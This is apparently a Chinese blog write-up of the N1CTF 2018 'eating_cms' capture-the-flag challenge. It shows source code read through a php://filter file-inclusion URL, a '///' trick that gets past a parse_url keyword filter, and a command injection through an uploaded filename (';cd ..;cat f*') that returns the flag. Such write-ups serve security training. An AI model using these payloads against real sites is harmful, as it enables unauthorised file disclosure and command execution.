[CTF]WriteUp第46篇
|
|
444
|
0
|
每日WriteUp

844 字
|
20 分钟

[N1CTF 2018]eating_cms

思路

首页看到是一个登陆页面
先dirsearch扫一下:

[22:08:07] 200 -   47B  - /.viminfo
[22:14:05] 200 -    0B  - /config.php
[22:17:26] 200 -   30B  - /info.php
[22:18:27] 302 -    1B  - /login.php  ->  error_parameter.php
[22:21:47] 200 -  596B  - /register.php

发现有register.php,尝试注册登录
进入后发现仅有登出键可用

看看别的文件:

.viminfo

vim updateadmin.php
vim info.php
vim login.php

其中login.php就是登录的api接口,info和updateadmin进不去
config.php也进不去

由于涉及到注册登录,测试二次注入,失败

解题

其实我的经验还是不够丰富,老手能一下看出/user.php?page=是文件包含,此事在01ctfer中亦有记载
尝试用php伪协议读文件:

index.php
/user.php?page=php://filter/read=convert.base64-encode/resource=index

<?php
require_once "function.php";
if(isset($_SESSION['login'] )){
    Header("Location: user.php?page=info");
}
else{
    include "templates/index.html";
}
?>

没有什么

login.php
/user.php?page=php://filter/read=convert.base64-encode/resource=login

<?php
require_once "function.php";
if($_POST['action'] === 'login'){
    if (isset($_POST['username']) and isset($_POST['password'])){
        $user = $_POST['username'];
        $pass = $_POST['password'];
        $res = login($user,$pass);
        if(!$res){
            Header("Location: index.php");
        }else{
            Header("Location: user.php?page=info");
        }
    }
    else{
        Header("Location: error_parameter.php");
    }
}else if($_REQUEST['action'] === 'logout'){
    logout();
}else{
    Header("Location: error_parameter.php");
}

?>

没有什么,正常的登陆设计

register.php
/user.php?page=php://filter/read=convert.base64-encode/resource=register

<?php
require_once "function.php";
if($_POST['action'] === 'register'){
    if (isset($_POST['username']) and isset($_POST['password'])){
        $user = $_POST['username'];
        $pass = $_POST['password'];
        $res = register($user,$pass);
        if($res){
            Header("Location: index.php");
        }else{
            $errmsg = "Username has been registered!";
        }
    }
    else{
        Header("Location: error_parameter.php");
    }
}
if (!$_SESSION['login']) {
    include "templates/register.html";
} else {
    Header("Location : user.php?page=info");
}

?>

没有什么

updateadmin.php
/user.php?page=php://filter/read=convert.base64-encode/resource=updateadmin

<?php
if (FLAG_SIG != 1){
    die("you can not visit it directly ");
}
include "templates/update.html";
?>

有个页面

info.php
/user.php?page=php://filter/read=convert.base64-encode/resource=info

<?php
if (FLAG_SIG != 1){
    die("you can not visit it directly ");
}
include "templates/info.html";
?>

页面

config.php
/user.php?page=php://filter/read=convert.base64-encode/resource=config

<?php
error_reporting(E_ERROR | E_WARNING | E_PARSE);
define(BASEDIR, "/var/www/html/");
define(FLAG_SIG, 1);
$OPERATE = array('userinfo','upload','search');
$OPERATE_admin = array('userinfo','upload','search','manage');
$DBHOST = "localhost";
$DBUSER = "root";
$DBPASS = "Nu1LCTF2018!@#qwe";
//$DBPASS = "";
$DBNAME = "N1CTF";
$mysqli = @new mysqli($DBHOST, $DBUSER, $DBPASS, $DBNAME);
if(mysqli_connect_errno()){
        echo "no sql connection".mysqli_connect_error();
        $mysqli=null;
        die();
}
?>

有mysql信息,不过用不到

user.php
/user.php?page=php://filter/read=convert.base64-encode/resource=user

<?php
require_once("function.php");
if( !isset( $_SESSION['user'] )){
    Header("Location: index.php");

}
if($_SESSION['isadmin'] === '1'){
    $oper_you_can_do = $OPERATE_admin;
}else{
    $oper_you_can_do = $OPERATE;
}
//die($_SESSION['isadmin']);
if($_SESSION['isadmin'] === '1'){
    if(!isset($_GET['page']) || $_GET['page'] === ''){
        $page = 'info';
    }else {
        $page = $_GET['page'];
    }
}
else{
    if(!isset($_GET['page'])|| $_GET['page'] === ''){
        $page = 'guest';
    }else {
        $page = $_GET['page'];
        if($page === 'info')
        {
//            echo("<script>alert('no premission to visit info, only admin can, you are guest')</script>");
            Header("Location: user.php?page=guest");
        }
    }
}
filter_directory();
//if(!in_array($page,$oper_you_can_do)){
//    $page = 'info';
//}
include "$page.php";
?>

就是加载页面的,老手经验还是厉害

function.php
/user.php?page=php://filter/read=convert.base64-encode/resource=function

<?php
session_start();
require_once "config.php";
function Hacker()
{
    Header("Location: hacker.php");
    die();
}


function filter_directory()
{
    $keywords = ["flag","manage","ffffllllaaaaggg"];
    $uri = parse_url($_SERVER["REQUEST_URI"]);
    parse_str($uri['query'], $query);
//    var_dump($query);
//    die();
    foreach($keywords as $token)
    {
        foreach($query as $k => $v)
        {
            if (stristr($k, $token))
                hacker();
            if (stristr($v, $token))
                hacker();
        }
    }
}

function filter_directory_guest()
{
    $keywords = ["flag","manage","ffffllllaaaaggg","info"];
    $uri = parse_url($_SERVER["REQUEST_URI"]);
    parse_str($uri['query'], $query);
//    var_dump($query);
//    die();
    foreach($keywords as $token)
    {
        foreach($query as $k => $v)
        {
            if (stristr($k, $token))
                hacker();
            if (stristr($v, $token))
                hacker();
        }
    }
}

function Filter($string)
{
    global $mysqli;
    $blacklist = "information|benchmark|order|limit|join|file|into|execute|column|extractvalue|floor|update|insert|delete|username|password";
    $whitelist = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'(),_*`-@=+><";
    for ($i = 0; $i < strlen($string); $i++) {
        if (strpos("$whitelist", $string[$i]) === false) {
            Hacker();
        }
    }
    if (preg_match("/$blacklist/is", $string)) {
        Hacker();
    }
    if (is_string($string)) {
        return $mysqli->real_escape_string($string);
    } else {
        return "";
    }
}

function sql_query($sql_query)
{
    global $mysqli;
    $res = $mysqli->query($sql_query);
    return $res;
}

function login($user, $pass)
{
    $user = Filter($user);
    $pass = md5($pass);
    $sql = "select * from `albert_users` where `username_which_you_do_not_know`= '$user' and `password_which_you_do_not_know_too` = '$pass'";
    echo $sql;
    $res = sql_query($sql);
//    var_dump($res);
//    die();
    if ($res->num_rows) {
        $data = $res->fetch_array();
        $_SESSION['user'] = $data[username_which_you_do_not_know];
        $_SESSION['login'] = 1;
        $_SESSION['isadmin'] = $data[isadmin_which_you_do_not_know_too_too];
        return true;
    } else {
        return false;
    }
    return;
}

function updateadmin($level,$user)
{
    $sql = "update `albert_users` set `isadmin_which_you_do_not_know_too_too` = '$level' where `username_which_you_do_not_know`='$user' ";
    echo $sql;
    $res = sql_query($sql);
//    var_dump($res);
//    die();
//    die($res);
    if ($res == 1) {
        return true;
    } else {
        return false;
    }
    return;
}

function register($user, $pass)
{
    global $mysqli;
    $user = Filter($user);
    $pass = md5($pass);
    $sql = "insert into `albert_users`(`username_which_you_do_not_know`,`password_which_you_do_not_know_too`,`isadmin_which_you_do_not_know_too_too`) VALUES ('$user','$pass','0')";
    $res = sql_query($sql);
    return $mysqli->insert_id;
}

function logout()
{
    session_destroy();
    Header("Location: index.php");
}

?>

核心代码就在这里了
结合上面的user.php可以发现在include之前先进行了filter_directory

function filter_directory()
{
    $keywords = ["flag","manage","ffffllllaaaaggg"];
    $uri = parse_url($_SERVER["REQUEST_URI"]);
    parse_str($uri['query'], $query);
//    var_dump($query);
//    die();
    foreach($keywords as $token)
    {
        foreach($query as $k => $v)
        {
            if (stristr($k, $token))
                hacker();
            if (stristr($v, $token))
                hacker();
        }
    }
}

可以看到是通过parse_url进行读取url的
parse_url有个常用的利用点:只要将/user.php变为///user.php就会导致parse_url认为这是错误格式的url(过于错误),从而返回false

用这种方式绕过之后,我们可以访问ffffllllaaaaggg

ffffllllaaaaggg
///user.php?page=php://filter/read=convert.base64-encode/resource=ffffllllaaaaggg

<?php
if (FLAG_SIG != 1){
    die("you can not visit it directly");
}else {
    echo "you can find sth in m4aaannngggeee";
}
?>

继续访问:

m4aaannngggeee
///user.php?page=php://filter/read=convert.base64-encode/resource=m4aaannngggeee

<?php
if (FLAG_SIG != 1){
    die("you can not visit it directly");
}
include "templates/upload.html";

?>

继续访问:/templates/upload.html
在源码中发现文件上传:

<form action="upllloadddd.php" method="post" enctype="multipart/form-data">
    <label for="file">Filename:</label>
    <input type="file" name="file" id="file">
    <br>
    <input type="submit" name="submit" value="Submit">
</form>

upllloadddd.php
///user.php?page=php://filter/read=convert.base64-encode/resource=upllloadddd

<?php
$allowtype = array("gif","png","jpg");
$size = 10000000;
$path = "./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/";
$filename = $_FILES['file']['name'];
if(is_uploaded_file($_FILES['file']['tmp_name'])){
    if(!move_uploaded_file($_FILES['file']['tmp_name'],$path.$filename)){
        die("error:can not move");
    }
}else{
    die("error:not an upload file!");
}
$newfile = $path.$filename;
echo "file upload success<br />";
echo $filename;
$picdata = system("cat ./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/".$filename." | base64 -w 0");
echo "<img src='data:image/png;base64,".$picdata."'></img>";
if($_FILES['file']['error']>0){
    unlink($newfile);
    die("Upload file error: ");
}
$ext = array_pop(explode(".",$_FILES['file']['name']));
if(!in_array($ext,$allowtype)){
    unlink($newfile);
}
?>

这一行很关键,可以通过文件名命令执行:

$picdata = system("cat ./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/".$filename." | base64 -w 0");

我们手动发包,filename为;cd ..;cat f*
返回:

file upload success<br />;cd ..;cat f*ZmxhZ3thMzI2NmI2Ny1jMGM5LTRhYjEtYWQzZi00ZGNhNDNkZDhhZWN9Cg==<img src='data:image/png;base64,ZmxhZ3thMzI2NmI2Ny1jMGM5LTRhYjEtYWQzZi00ZGNhNDNkZDhhZWN9Cg=='></img>

解码得

flag{a3266b67-c0c9-4ab1-ad3f-4dca43dd8aec}

这样就结束了,上面之前还有一些页面,也可以去看看

/templates/info.html:没有什么
/templates/update.html:显示有updateadmin233333333333333.php

updateadmin233333333333333.php
/user.php?page=php://filter/read=convert.base64-encode/resource=updateadmin233333333333333

<?php
require_once("function.php");
if( !isset( $_SESSION['user'] )){
    Header("Location: index.php");

}
//die($_SESSION['isadmin']);
if (($_REQUEST['username'])) {

    if ($_SESSION['isadmin'] === '1') {
        $user2up = $_REQUEST['username'];
//    die($user2up);
        $ress = updateadmin('1', $user2up);
//    die('11111');
//    die($ress);
        if ($ress == 1) {
//        die('1111111sdfdsfs');
            echo "<script>alert('update success')</script>";
        } else {
            echo "<script>alert('update fail')</script>";
        }
    } else {
        Header("Location: index.php");
    }
}
//if(!in_array($page,$oper_you_can_do)){
//    $page = 'info';
//}
?>

要权限才行,这个也没用

本来想再看看能不能看到密码,看看爆破的可能性,但是不知道怎么看

注意

新的知识点:parse_url///绕过

暂无评论

发送评论 编辑评论 


				

			

						

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
							
															
													

					

				

			

			
			

				

					
				

			

				

											

							
							
						

																				
					
											
						

	

		
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
	

	

		
颜文字
Emoji
小恐龙
花!
	


									

			

			
			
		

	






上一篇
下一篇 

                    

                    
			        推荐文章
		            

		            

							
[CTF]WriteUp第55篇

							
							

							
[CTF]WriteUp第54篇

							
							

							
[CTF]WriteUp第53篇

							
							

							
[CTF]WriteUp第52篇

							
							

							
[CTF]WriteUp第51篇

							
							

							
[CTF]WriteUp第50篇

							
							

							
[CTF]WriteUp第49篇

							
							

							
[CTF]WriteUp第48篇

							
							

							
[CTF]WriteUp第47篇

							
							

							
[CTF]WriteUp第45篇